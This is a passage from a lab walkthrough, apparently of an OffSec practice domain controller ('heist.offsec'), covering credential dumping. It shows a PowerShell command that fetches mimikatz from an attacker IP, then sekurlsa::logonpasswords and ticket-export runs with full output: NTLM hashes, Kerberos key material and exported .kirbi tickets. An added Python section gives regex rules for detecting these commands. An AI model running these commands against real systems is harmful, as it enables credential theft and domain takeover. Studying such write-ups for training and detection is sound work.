Credential Dump


SYSTEM-level compromise has been achieved on the dc01.heist.offsec (192.168.198.165) host. The next step is dumping credentials.

mimikatz


PS C:\tmp> iwr -Uri http://192.168.45.176/mimikatz.exe -OutFile C:\tmp\mimikatz.exe

Uploading mimikatz.exe to the target.

sekurlsa::logonpasswords


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"    # Base credentials
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80645653  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80670468  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 69682 (00000000:00011032)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : b4063f6d0dcb5265dc5f62b0309e4ae3
	 * SHA1     : a5ec93cd9e239957b70d11328ab953b20060b5db
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : 1561bd404f929907a89517d421b5f11b
	 * SHA1     : 38fa65451f13e088d5d078609994c1fd14a35412
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : dc01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
	ssp :	
	credman :	
 
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : b4063f6d0dcb5265dc5f62b0309e4ae3
	 * SHA1     : a5ec93cd9e239957b70d11328ab953b20060b5db
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 39710 (00000000:00009b1e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:30 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : 1561bd404f929907a89517d421b5f11b
	 * SHA1     : 38fa65451f13e088d5d078609994c1fd14a35412
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	
 
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session           : Service from 0
User Name         : enox
Domain            : HEIST
Logon Server      : DC01
Logon Time        : 8/1/2024 7:28:11 PM
SID               : S-1-5-21-537427935-490066102-1511301751-1103
	msv :	
	 [00000003] Primary
	 * Username : enox
	 * Domain   : HEIST
	 * NTLM     : bddb2a060aac3fb97c34707fabee7f30
	 * SHA1     : 2623046d4ccacd41f7a908c769159d2d47f4a413
	 * DPAPI    : ef151fe09709c9334485fc9640f4b1f5
	tspkg :	
	wdigest :	
	 * Username : enox
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : enox
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
	ssp :	
	credman :	
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	
 
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : 1561bd404f929907a89517d421b5f11b
	 * SHA1     : 38fa65451f13e088d5d078609994c1fd14a35412
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : b4063f6d0dcb5265dc5f62b0309e4ae3
	 * SHA1     : a5ec93cd9e239957b70d11328ab953b20060b5db
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : 1561bd404f929907a89517d421b5f11b
	 * SHA1     : 38fa65451f13e088d5d078609994c1fd14a35412
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : DC01$
	 * Domain   : HEIST
	 * NTLM     : 1561bd404f929907a89517d421b5f11b
	 * SHA1     : 38fa65451f13e088d5d078609994c1fd14a35412
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
	ssp :	
	credman :	
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:30 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DC01$
	 * Domain   : HEIST
	 * Password : (null)
	kerberos :	
	 * Username : dc01$
	 * Domain   : HEIST.OFFSEC
	 * Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
	ssp :	
	credman :	
 
mimikatz(commandline) # exit
Bye!

NTLM hashes taken from the output above:
  • DC01$:1561bd404f929907a89517d421b5f11b
  • enox:bddb2a060aac3fb97c34707fabee7f30
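
A defender-side view of the commands on this page, as an added example that is not part of the original write-up: three detection rules run over constructed log records. The record layout (`image`, `text`), the rule names and records 3 to 5 are assumptions made for illustration; the `text` of records 0 to 2 is the command as typed on this page.

```python
import re

# mimikatz takes its work as module::command arguments, so the command line
# carries these tokens whatever the executable has been renamed to.
MIMIKATZ_TOKEN = re.compile(
    r"\b(?:privilege|token|sekurlsa|lsadump|kerberos)::[a-z_]+", re.I)
# PowerShell web request that writes an executable to disk.
PS_DOWNLOAD_EXE = re.compile(
    r"\b(?:iwr|Invoke-WebRequest)\b.*-OutFile\s+\S+\.(?:exe|dll)\b", re.I)
# Tickets exported by sekurlsa::tickets /export are saved as .kirbi files.
KIRBI = re.compile(r"\.kirbi\b", re.I)

# Constructed records: "image" is the process image, "text" is the command
# line or PowerShell script-block text. The field names are assumptions,
# not a real log schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": r"iwr -Uri http://192.168.45.176/mimikatz.exe -OutFile C:\tmp\mimikatz.exe"},
    {"image": r"C:\tmp\mimikatz.exe",
     "text": r'.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"'},
    {"image": r"C:\tmp\mimikatz.exe",
     "text": r'.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit" ; dir *.kirbi'},
    # Constructed: the same tool under another file name.
    {"image": r"C:\tmp\svc.exe",
     "text": r'.\svc.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"'},
    # Constructed benign records that must stay quiet.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": r"iwr -Uri https://intranet.example/readme.txt -OutFile C:\tmp\readme.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": r"Get-ChildItem C:\tmp"},
]


def detect(event):
    """Return the names of the rules that fire on one record."""
    text = event["text"]
    hits = []
    if PS_DOWNLOAD_EXE.search(text):
        hits.append("ps_download_executable")
    if MIMIKATZ_TOKEN.search(text):
        hits.append("mimikatz_module_syntax")
    if KIRBI.search(text):
        hits.append("kirbi_ticket_file")
    return hits


def mimikatz_commands(event):
    """List the module::command tokens in a record, for the alert text."""
    return [m.group(0).lower() for m in MIMIKATZ_TOKEN.finditer(event["text"])]


def detect_by_image_name(event):
    """Name-only rule, kept for comparison: a renamed binary defeats it."""
    return "mimikatz" in event["image"].lower()


def triage(events):
    """Map record index -> fired rules, for records with at least one hit."""
    alerts = {}
    for index, event in enumerate(events):
        hits = detect(event)
        if hits:
            alerts[index] = hits
    return alerts


if __name__ == "__main__":
    for index, rules in triage(SAMPLE_EVENTS).items():
        event = SAMPLE_EVENTS[index]
        print(index, rules, mimikatz_commands(event),
              "name-only rule fires:", detect_by_image_name(event))
```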

sekurlsa::tickets


PS C:\tmp> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit" ; dir *.kirbi    # All tickets
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # sekurlsa::tickets /export
 
Authentication Id : 0 ; 79087016 (00000000:04b6c5a8)
Session           : Network from 0
User Name         : svc_apache$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 9:35:40 AM
SID               : S-1-5-21-537427935-490066102-1511301751-1105
 
	 * Username : svc_apache$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 9:16:27 AM ; 7/7/2025 7:12:48 PM ; 
	   Service Name (01) : HTTP ; dc01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : svc_apache$ ; @ HEIST.OFFSEC
	   Flags 50a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     e08633d0819ff3a5f7984d92a67c6ad3a298abb4be93881c41d92d1832a0a19c
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;4b6c5a8]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 18659765 (00000000:011cb9b5)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:51:36 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:51:36 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     0b0d9c36e92a3ec3af5d54819d426b8bf9f5c87c78310b0539708d7440343ce7
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;11cb9b5]-1-0-40a50000-DC01$@GC-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 2455887 (00000000:0025794f)
Session           : Network from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 6:41:40 AM
SID               : S-1-5-18
 
	 * Username : DC01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ; 
	   Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5	[...]
	   * Saved to file [0;25794f]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 69682 (00000000:00011032)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-90-0-1
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-20
 
	 * Username : dc01$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:11 AM ; 7/7/2025 4:39:11 PM ; 7/14/2025 6:39:11 AM
	   Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     77198af9f6bc6ab43a2942a1eb5a991a323c07a1064c4fedbff9adc4f332cb3f
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 6	[...]
	   * Saved to file [0;3e4]-0-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 6:39:11 AM ; 7/7/2025 4:39:11 PM ; 7/14/2025 6:39:11 AM
	   Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Target Name  (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
	   Client Name  (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
	   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     bb1ed6e6ba4fb8ca6ea521e4cd4886f4c7b4b0d38b85917437b5c8c0113e4b9c
	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2	[...]
	   * Saved to file [0;3e4]-2-0-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
 
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
 
	 * Username : DC01$
	 * Domain   : heist.offsec
	 * Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64 
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
 
	Group 2 - Ticket Granting Ticket
 
Authentication Id : 0 ; 78904294 (00000000:04b3fbe6)
Session           : Network from 0
User Name         : svc_apache$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 7/7/2025 9:16:27 AM
SID               : S-1-5-21-537427935-490066102-1511301751-1105
 
	 * Username : svc_apache$
	 * Domain   : HEIST.OFFSEC
	 * Password : (null)
 
	Group 0 - Ticket Granting Service
 
	Group 1 - Client Ticket ?
	 [00000000]
	   Start/End/MaxRenew: 7/7/2025 9:16:27 AM ; 7/7/2025 7:12:48 PM ; 
	   Service Name (01) : HTTP ; dc01.heist.offsec ; @ HEIST.OFFSEC
	   Target Name  (--) : @ HEIST.OFFSEC
	   Client Name  (01) : svc_apache$ ; @ HEIST.OFFSEC
	   Flags 50a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ; 
	   Session Key       : 0x00000012 - aes256_hmac      
	     e08633d0819ff3a5f7984d92a67c6ad3a298abb4be93881c41d92d1832a0a19c
